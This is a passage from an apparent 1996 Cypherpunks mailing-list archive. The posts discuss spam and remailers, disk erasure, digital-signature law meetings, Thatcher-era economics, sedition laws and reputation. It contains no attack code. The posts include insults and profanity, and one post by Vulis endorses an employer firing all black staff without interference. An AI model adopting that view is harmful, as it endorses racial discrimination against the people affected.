       explore all major issues surrounding this topic, and produce a set
       of draft guidelines for comment.  The proposed guidelines are
       intended to facilitate secure electronic commerce by
       clarifying the rights and obligations of the parties involved
       in voluntary commercial key escrow. The work product may take
       one or more forms including:
       (i)   a "restatement" of the relevant law and practice,
       (ii)  a model state or federal law or international convention,
       (iii) a set of principles that can be incorporated by reference
               into agreements or used for the interpretation of legal
               aspects of voluntary key escrow, or
       (iv)  a set of "gap filler" provisions.

    Liability Work Group
    Contact: Maureen Adamache (rmadama@magi.com)
       The liability work group will meet as necessary to discuss
       the apportionment of liabilities among PKI providers and users.
       Previously, this task was considered in the ISC's own work-product,
       the Digital Signature Guidelines.  Future documents that will
       be considered include Certification Practice Statements, and digital
       signature legislative and regulatory work product.

    State Government Digital Signatures Laws & Regulations
    Contact: Dan Greenwood (DGreenwood@state.ma.us)
       The digital signature legislative and regulatory working group
       will compile, evaluate and compare the various emerging
       approaches by states and other jurisdictions. Work product will
       include a web-based comprehensive "one-stop shop" for
       jurisdictions wishing to review current approaches.


First-time participants (who plan to attend the October 18-19, 1996
meeting) must request attendance and submit a brief work-product
(typically 3-5 pages) relevant to the subject matter. Please contact Ruven
Schwartz (v: 612.687.8095, f: 612.687.7907, or e:
rschwart@research.westlaw.com) for details.

Meeting Location:
McCormack Building (Across Bowdoin Street from the State House)
1 Ashburton Place
Room 1, 21st Floor
Boston, Massachusetts USA
(Contact: Dan Greenwood +1 617.973.0071)

Meals:  The cafeteria will be available for lunch on Friday for those ISC
Members who choose to work through the joint lunch session.  On Saturday
we will probably order in pizza.

Lodging: A very nearby hotel is the Holiday Inn, Government Center, 5
Blossom Street, Boston. The regular rate during our meeting dates is
$219.95/night.  However, the Reservation Supervisor (Kim) has offered a
rate of $199.95 to Committee members who request the "Great Rate"  plan.
Call reservations at +1 617.742.7630.  For a better (but more expensive)
hotel near Government Center, try the Parker House at +1 617.227.8600.
The Omni Parker House (nicer than Holiday Inn) quoted a rate of $169/night
for a single with a king or queen bed and $119/night for a single with a
double bed.  The rooms are very small - but the hotel is nice.  See also a
Greater Boston Bed & Breakfast directory:
http://www.inovatec.com/bb/resservc/GREATER/GREATER.htm.

RSVP:  Please confirm your intention to participate to Ann Kowalsky,
Section Manager, Section of Science and Technology
(sciencetech@attmail.com) as soon as possible.

See you in Boston!

===========================================================================

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sun, 15 Sep 1996 02:53:00 +0800
To: cypherpunks@toad.com
Subject: Re: unwanted mail..what can I do?
Message-ID: <960914123556_284798391@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-09-14 01:18:49 EDT, dlv@bwalk.dm.com (Dr.Dimitri Vulis
KOTM) writes:

<< 
 AwakenToMe@aol.com writes:
 
 > I recieved mail from netfree.com..
 > I tried mailing it back (it def. had a forged address, but I got the
netfree
 > from the mail header.....)
 > So anyway..... I tried sending to root@netfree....my mail was rejected
(not
 > unknown ...it was rejected by the system) said it wasnt authorized... so I
 > tried support@netfree...same thing.
 > It ISSSSS rather annoying...any sugestions?
 
 Yes, a bunch of them:
 
 1. Get a life. Learn to delete unwanted e-mail. Get a real shell account.
 
 2. Ask AOL to let its users decide what e-mail to reject automatically (like
 procmail). They've been promising this capability by the end of September.
 Then you can set up your account to get no more e-mail from netfree.
  >>
Typical asshole response. I must thank chuck@nova..etc. for his TRULY helpful
response.
But you........get a real shell account?? I do thank you. netcom and a school
system. I can delete unwanted mail. But maybe I LIKE to yell at people who
spam me. And ive never received mail from netfree before..nor since... thats
NOT my problem. Learn to comprehend what pthers write. I wanted to know what
I can do about getting in coontact with them. It is in my opinion not right
to forge email addresses...people dont do it when the send me us postal mail




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Sun, 15 Sep 1996 05:49:24 +0800
To: Troy@crl.com
Subject: The HipCrime [NOISE]
Message-ID: <199609141949.AA05431@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Who cares?  The rebuttals by the Hipmeister sound like he's pretty
cool.  So fuck off, net-cops.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Admin <admin@superhot.com>
Date: Sun, 15 Sep 1996 05:33:25 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: Exactly the point Lance... [Fwd: HipCrime and Art]
Message-ID: <199609141912.NAA13899@rintintin.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 AM 9/14/96 -0700, you wrote:
>>At 09:53 PM 9/13/96 -0700, you wrote:
>>>>>At 21:50 9/11/96, Ross Wright <rwright@adnetsol.com> wrote to
>>>>>cypherpunks@toad.com and remailer-operators@c2.org:
>>>>>>As I said having a website invites comments.  It's like being a
>>>>>>public figure.  In effect you are publishing your e-mail address.
>>>>>
>>>>>
>>>>>Interesting perspective.  However, placing an email address on a web page
>>>>>is by no means an offer to take "comments" (i.e., marketing spams) on
>>>>>anything that strikes the spammer's fancy.
>>>>
>>>>How would you know what the *intent* of these other people is in placing
>>>>mailme: tags on their public pages unless you have been to the specific
>>>>pages. You speak only for yourself, yet you try to imply that you speak for
>>>>everyone on the www who has placed a mailto: tag on their pages.
>>>>
>>>
>>>I think this is exactly the point. On a given page I might have several
>>>mailto tags. One for comments on some subject, one for feedback, and one
>>>for the webmaster. I expect the person mailing me to take the time to use
>>>the correct mailbox. I created a page urging political activism, and
>>>included a mailto for all the relevant Senators and Representatives. I
>>>hardly think they are interested in this kind of spam.
>>
>>Of course, that would be for THEM to decide what they find interesting or
>>not. Every response to this thread always seems to impart some speculation
>>as to what other people might or might not find interesting. What one finds
>>of interest another may not so why don't we leave it up to the recipients
>>themselves instead of some self appointed censors. I'll decide whats
>>interesting to me, you decide what is interesting to you, and the senators
>>can decide whats interesting to them.
>>
>>I'm sure that some senators/reps on the various endowment for the arts
>>committees, and or the technology oversight committees would have found
>>HipCrime's sight to be of some interest. Of course if it was a blurb of some
>>new mixmaster/remailer development, you would have found it of interest, so
>>lets stop trying to guess what other people want and speak for ourselves.
>>
>>>
>>>Trawling the web for every address you can find, then mailing them all
>>>seems very inappropriate.
>>
>>To you it may not seem appropriate, as its a subjective judgement, I'm sure
>>that some brown-shirted jack-booted gov't officials beleive that using a
>>remailer for any reason is inappropriate....thats what's great about this
>>world, we all have our own subjective beliefs.
>>
>>admin
>
>Allow me to make this more concrete. I don't want see any of this fucking
>shit in my mailbox just because I have a mailto link on my Mixmaster page.
>Is that sufficiently clear? 

Exactly the point, bingo!  The point is this, exactly what do YOU define as
*fucking shit* so that anyone who visits your page will know exactly what
they can and can't say to Lance Cottrell. We've determined that you don't
want to receive the HipCrime URL from your mailto: button. What about the
next visitor who comes across your page, how will they know exactly what you
do or do not find interesting? Will you put a lengthy *what I expect from
all correspondents who use my mailto: button* explanation on the page?

Perhaps a simple, *don't mail me unless I already know you and want to hear
what you have to say...* tag?

admin


>	-Lance
>
>----------------------------------------------------------
>Lance Cottrell   loki@obscura.com
>PGP 2.6 key available by finger or server.
>Mixmaster, the next generation remailer, is now available!
>http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com
>
>"Love is a snowmobile racing across the tundra.  Suddenly
>it flips over, pinning you underneath.  At night the ice
>weasels come."
>                        --Nietzsche
>----------------------------------------------------------
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnny Eriksson <bygg@sunet.se>
Date: Sat, 14 Sep 1996 21:50:03 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
Message-ID: <CMM.0.88.842701438.bygg@sunic.sunet.se>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos writes:

> I am now getting more junk email than email from people I 
> care to correspond with.  It seems one can't even read the
> scholarly newsgroups anymore without "Come Watch Us Lick
> Ourselves on the Web" messages popping up regularly.

How inappropriate.  Such messages belongs in rec.pets.cats.

--Johnny




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 15 Sep 1996 06:56:53 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Erasing Disks
Message-ID: <199609142059.NAA13108@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


N.B. Your disagreement is with Peter's paper, not me unless I have
inadvertently misrepresented what he wrote.

At  2:15 AM 9/14/96 -0700, Bill Stewart wrote:
>I disagree.  The methods for declassification in the Army and
>Defense Department security manuals included several approaches:
>1) Physical destruction - acid, sandblasters, etc.
>2) NSA-Approved Whopping Big Magnets

I think Peter was looking for non-destructive methods which would allow
continued use of the hard disk
>3) NSA-Approved Hopefully-Bugfree computer programs for some computers.
>
>The most secure methods were the unclassified ones - after we
>sandblasted our RM05 disk packs, the NSA and KGB can't read anything.
>The less secure methods are the ones that require NSA approval -
>how strong  is a Whopping Big Magnet this year?  (Too strong to put 
>near MY computer lab, thank you! :-)

Peter thinks this strength is to strong for practical application.  He
describes someone who had a strong enough research magnet which bent the
platters.  Since erasing the clocking tracks requires them to be rewritten
at the factory, magnets do not allow reuse of hard disks.

>But shredding the floppy?  No need to classify that, no secrets leaked

Burn after shredding, or you have a puzzle fan reassembling the shredded disk.

Hastily, but with regards - Bill


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 15 Sep 1996 01:50:32 +0800
To: cypherpunks@toad.com
Subject: EGO_war
Message-ID: <199609141524.PAA09661@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-13-96. FiTi: 
 
   "On manoeuvres in the modern military mind." 
 
      The most interesting challenge is psychological. 
      Participants learn the hard way that they cannot simply 
      command. They must persuade, cajole and win over 
      subordinates, allies and politicians, who may have 
      varying agendas. While lower level command requires 
      physical courage and speed of decision, higher commmand 
      involves moral courage, intellectual vision and 
      perseverance. 
 
      "Politicians are being pressed by interest groups on all 
      sides, while the military will usually only focus on 
      their aspect of the task. The collision of those two 
      sets of values can be quite a shock." 
 
      The more subtle message from the historians is the 
      lethal potential of petty jealousies, warring ambitions 
      and clashing egos. 
 
   ----- 
 
   http://jya.com/egowar.txt  (16 kb) 
 
   EGO_war 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 15 Sep 1996 02:53:48 +0800
To: cypherpunks@toad.com
Subject: MTH_ead
Message-ID: <199609141641.QAA11110@pipe4.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-14-96. WaPo: 
 
   "Empty-Head Network Fails to Link TWA Crash to Terrorism." 
 
      The frantic overseas intelligence-gathering effort, 
      which has included eavesdropping, use of informants and 
      offers of large cash payments for leads, has been 
      undertaken by the CIA, the NSA and the DEA, as well as 
      a number of foreign investigative agencies. The NRO has 
      analyzed voluminous archives of intelligence drawn from 
      spy satellites, intercepted phone calls and electronic 
      eavesdrops gathered before the crash. 
 
      Since right after the TWA crash, the NSA started 
      monitoring phone conversations of people believed to 
      have ties to terrorists groups, as well as trying to 
      track the movements of suspected terrorists. The CIA, 
      working through its sources, has been offering money for 
      leads on any kind of terrorist role. The DEA has been 
      using overseas agents to gather intelligence; the FBI 
      liaisons stationed in 23 countries are working to gather 
      intelligence on the crash; and Scotland Yard and the 
      Mossad are also empty-handed (not Red-handed -- yet). 
 
   ----- 
 
   http://jya.com/mthead.txt  (10 kb) 
 
   MTH_ead 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 15 Sep 1996 07:02:59 +0800
To: "Perry E. Metzger" <cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <51amo5$p01@life.ai.mit.edu>
Message-ID: <323B1926.5656@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Hallam-Baker writes:
> > Pity you guys missed out on the idea of trades unions and think that
> > employment is some kind of serfdom in which you loose all your
> > rights the day you sign up. If you hadn't sold your government to
> > the cooprorations a while back you might have got out of the middle
> > ages.
> 
> Yes, we could be a workers paradise like one of those lovely European
> countries with double digit unemployment and all. Too bad we didn't go
> in for democratic socialism while we could have, eh?

Perry, hate to burst your bubble but unemployment in the UK _trippled_
in the first eighteen months of rule by that great socialist Margret
Thatcher. One third of UK manufaturing industry went bankrupt in the
only large scale application of Freedman's ideas.

The UK only began to recover after the monetarist policies were
consigned to the dustbin. Unemployment remained high despite a sustained
attack on workers rights. 

The scenario you described is an unjust one but it would be equally
unjust if the company was bought out and the new owner decided to sack
all black people and people called "Perry". You were the one who brought
up the issue of fairness.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 15 Sep 1996 10:04:30 +0800
To: cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
Message-ID: <v01540b00ae60ea2b4aac@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>Perry E. Metzger wrote:
>>
>> Hallam-Baker writes:
>> > Pity you guys missed out on the idea of trades unions and think that
>> > employment is some kind of serfdom in which you loose all your
>> > rights the day you sign up. If you hadn't sold your government to
>> > the cooprorations a while back you might have got out of the middle
>> > ages.
>>
>> Yes, we could be a workers paradise like one of those lovely European
>> countries with double digit unemployment and all. Too bad we didn't go
>> in for democratic socialism while we could have, eh?
>
>Perry, hate to burst your bubble but unemployment in the UK _trippled_
>in the first eighteen months of rule by that great socialist Margret
                                                    ^^^^^^^^^
>Thatcher. One third of UK manufaturing industry went bankrupt in the
>only large scale application of Freedman's ideas.

Ummm. We're being Hallam-Baker PhD'ed again.

I think she was a little bit Tory. Conservative, maybe? Right wing? Funded
by industry? On kissing terms with Reagan? Socialist, no. Or was this an
attempt by Doctor Sarcasm at wit?

Actually the UK is now way ahead of the rest of Europe in terms of
deregulation, low labor costs, efficient manufacturing, etc. Germany and
France are now up the familiar creek because of their too-socialist
policies. But there are those who say that Thatcher's slash and burn
approach was appalling.

You get the government you deserve, but not necessarily when you deserve
it. That's what causes all the fuss.


-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sun, 15 Sep 1996 10:04:03 +0800
To: cypherpunks@toad.com
Subject: ?
In-Reply-To: <v01530500ae5c47e88dc7@[204.212.157.52]>
Message-ID: <199609150021.RAA18148@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In <517ia2$dmn@Networking.Stanford.EDU> llurch@stanford.edu (Skippy) writes:

! Too long. A few hours ago, the blocking ended, so Ingrid's wacky analysis 
! of how this is all a ZOG plot is moot.

Your consistent defence of censorship noted.  The mere fact that
censorship is evadable, never justifies the evil.  Would you make
the claim that there are no drug laws merely because it's easy to
evade the laws against possession?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Sep 1996 09:00:52 +0800
To: cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <323B1926.5656@ai.mit.edu>
Message-ID: <3VL0TD46w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hallam-Baker <hallam@ai.mit.edu> writes:
> unjust if the company was bought out and the new owner decided to sack
> all black people and people called "Perry". You were the one who brought
> up the issue of fairness.

The owner should be able to do that without interference from any gubment.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 15 Sep 1996 11:48:37 +0800
To: cypherpunks@toad.com
Subject: Re: Alien and Sedition Acts [WAS xs4all.nl] then Terrorists
Message-ID: <v02130501ae6059f09b13@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Look for something along these lines from Congress in the not too distant
future.  All in our best interest, of course.  (from 'In Pursuit of Reason:
The Life of Thomas Jefferson, Nobel E. Cunningham, Jr.)

"The first alien act (June 25, 1798) empowered the president to order the
deportation of any alien he judged "dangerous to the peace and saftey of
the united State" or had reasonable grounds to suspect was involved in any
trasonable intrigue against the government.  It was up to the president to
determine what constituted a danger."

"Even more sweeping and more objectionable to Republican opponents of the
administration was the sedition act (July 14, 1798).  Passed in the final
days of of the session, after Jefferson had left for Virginia, the act made
it unlawful for any person to combine or conspire together to oppose any
lawful measure of the government, to prevent any officer of the united
States from performing his duties, or to aid or attempt to procure 'any
insurrection, roit, unlawful assembly, or combination.' Furthermore, it
provided for the punishment of any person writing, uttering, or publishing
'any false, scandalous and malicious writing' against the president, the
Congress of the government of the united States, made with the intent to
defame them or exite against them 'the hatred of the good people of the
united States.'"

>At Mon, 9 Sep 1996 17:54:29 -0700, Timothy C. May wrote:
>
>>     Then again, the only reason I am not a terrorist is that the government
>>hasn't YET defined hate speach directed against the government to be
>>terrorism.
>
>Don't be so hasty in saying this.
>
>A couple of months ago Clinton signed some sort of bill having to do with
>terrorism, terrorist organizations, funding of same, and deportation of
>alien-units suspected of being allied with terrorist organizations. (I seem
>to recall another such act being passed in early 1995, so there may be more
>than one of these things...)
>
>Given the mounting hysteria about terrorism (by the government, at least),
>and given the various laws on the books, I would not be surprised to see
>some Web sites prosecuted as "harboring" terrorists terrorist-symps.
>
>If any of you are not citizens of the U.S., and are here on visas, I would
>give this some real serious thought. Of course, maybe deportation is a
>blessing in disguise.
>
>--Tim May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregburk@netcom.com (Greg Burk)
Date: Sun, 15 Sep 1996 09:17:24 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <653f3e543r@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
Well, this looks like a chance to quickly correct some mistakes without
spending a lot of time framing the issue.
 
tcmay@got.net (Timothy C. May) writes:
> But this latest episode illustrates the role of reputations. Namely, my own
> reputation is not being harmed by bizarre commentaries from the Vulis-bot.
 
..among people who directly know you. You seem to see this as an
example of reputations in action. But there isn't any "repute" in there
at all. Surely this grand theoretical "reputation" framework isn't
needed to describe simple direct experience.
 
And it seems to me that your usage of "reputation" has at different
times meant both direct and indirect exposure. This clearly discards
important information, often to the detriment of your analysis. Perhaps
you can explain why the two separate things are the same in some
important way, aside from merely that they both involve esteem.
 
 
> As its reputation is (apparently) pretty low, and associated with Serdar
> Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity
> can hardly "assassinate" my character.
 
 
> A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx,"
> aka "Pablo Escobar," aka several other alternate personalities, wrote
> dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc.
> Did this have an effect on our reputations? Not to people I respected, of
> course. And if Detweiler's rants affected my reputation with his peers,
> including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic,
> well, this is to the good.
 
> In the mathematics of reputations, a negative reputation held by one whose
> own reputation is negative is a positive.
 
I don't think this is an example of any such thing. I would not respect
a person even a tiny bit more just because a kook disrespects them. In
fact, since the kooks frequently hold each other in very low esteem, the
suggested polarity-math is self-contradictory.
 
Rather, I think this is an example of how direct exposure supercedes
reputation.
 
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQBVAwUBMjs9GLMyVAabpHidAQE4PQH/dfVepFTivql8LtygN8BBoE/l03K7NOIH
HVvH4QbHBY2MyVNviRN9R6MF2LsJRYp5SzFfdC+1vm/ohnhWEYZ4aA==
=LdoS
-----END PGP SIGNATURE-----
t}t}t}t}t}t}t}t}.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregburk@netcom.com (Greg Burk)
Date: Sun, 15 Sep 1996 09:31:41 +0800
To: cypherpunks@toad.com
Subject: Re: Reputation in action
Message-ID: <7654f2dw3r@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
Well, this looks like a chance to quickly correct some mistakes without
spending a lot of time framing the issue.
 
tcmay@got.net (Timothy C. May) writes:
> But this latest episode illustrates the role of reputations. Namely, my own
> reputation is not being harmed by bizarre commentaries from the Vulis-bot.
 
..among people who directly know you. You seem to see this as an
example of reputations in action. But there isn't any "repute" in there
at all. Surely this grand theoretical "reputation" framework isn't
needed to describe simple direct experience.
 
And it seems to me that your usage of "reputation" has at different
times meant both direct and indirect exposure. This clearly discards
important information, often to the detriment of your analysis. Perhaps
you can explain why the two separate things are the same in some
important way, aside from merely that they both involve esteem.
 
 
> As its reputation is (apparently) pretty low, and associated with Serdar
> Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity
> can hardly "assassinate" my character.
 
 
> A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx,"
> aka "Pablo Escobar," aka several other alternate personalities, wrote
> dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc.
> Did this have an effect on our reputations? Not to people I respected, of
> course. And if Detweiler's rants affected my reputation with his peers,
> including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic,
> well, this is to the good.
 
> In the mathematics of reputations, a negative reputation held by one whose
> own reputation is negative is a positive.
 
I don't think this is an example of any such thing. I would not respect
a person even a tiny bit more just because a kook disrespects them. In
fact, since the kooks frequently hold each other in very low esteem, the
suggested polarity-math is self-contradictory.
 
Rather, I think this is an example of how direct exposure supercedes
reputation.
 
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQBVAwUBMjs9GLMyVAabpHidAQE4PQH/dfVepFTivql8LtygN8BBoE/l03K7NOIH
HVvH4QbHBY2MyVNviRN9R6MF2LsJRYp5SzFfdC+1vm/ohnhWEYZ4aA==
=LdoS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Sun, 15 Sep 1996 11:28:47 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Erasing Disks
In-Reply-To: <199609142059.NAA13108@netcom8.netcom.com>
Message-ID: <199609150111.UAA00636@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >But shredding the floppy?  No need to classify that, no secrets leaked
> 
> Burn after shredding, or you have a puzzle fan reassembling the shredded disk.

Actually, taking the cookie portion out, putting it on an inverted cup so
its in the center of the microwave, then letting it cook for 30 seconds
does the job quite well =)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 16 Sep 1996 00:11:01 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks
Message-ID: <842781740.23306.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> CypherPunks live so far from real-life, that it's impossible for them
> to communicate rationally.  Never having any danger in their lives,
> they want to avoid encountering any in "cyberspace".  They are trying 
> to craft that new world according to their intellectual guidelines.
> Trying to make sure real-world annoyances have been removed. 

No,

I can`t let that pass, the say that cypherpunks try to avoid danger 
in real life and online is absolute rubbish.
The libertarian polotics embodied by the cypherpunk movement 
encourages a way of life which is indeed more dangerous than other 
type of society, annoyances are different, sure they try to avoid 
annoyances, but this does not stretch as far as encouraging 
censorship, its just that, from my point of view anyway, most 
cypherpunks idea of a utopian society does not include big commerce, 
which is associated with big government, indeed most of us find the 
one minded lust for money of the junk mailers to be distasteful in 
itself.

to say we attempt to create a "safe" society online and off is 
correct but only in a superficial sense, I believe the cypherpunks 
want a safe society as much as anyone else but believe that the best 
way to achieve it is through individual liberty, not through 
totalitarian statist government, furthermore cypherpunks and 
libertarians as a whole accept that a dangerous society is an 
inevitable consequence of a free society, but that this is a price 
worth paying.


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 16 Sep 1996 04:18:19 +0800
To: cypherpunks@toad.com
Subject: Re: Fed appellate judge remarks re anonymity, free speech o
Message-ID: <842781745.23335.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> >The article quotes Kozinski as saying "I have a severe problem with
> >anonymous E-mailers . . . You don't have a right to walk up to somebody's
> >door and knock with a bag over your head." The article says Kozinski likened
> >anonymous E-mail to menacing someone.

What is the offense involved then, going bagged in a public place? 
since when do I or anyone else not have the right to wear a bag on my 
head?


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 16 Sep 1996 21:27:47 +0800
To: cypherpunks@toad.com
Subject: Re: "Remailers can't afford to be choosy"
Message-ID: <842781738.23305.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> >        Umm.... freedom of the press is freedom for he who owns the press.
> >The remailer operators own the presses; why shouldn't they use whatever means
> >they see fit to determine how they can be used? I encourage people not to
> >discriminate on the basis of the political orientation of what's going
> >through... but spam isn't political speech. (I agree that the government
> >should not be in the business of determining what is spam and what is
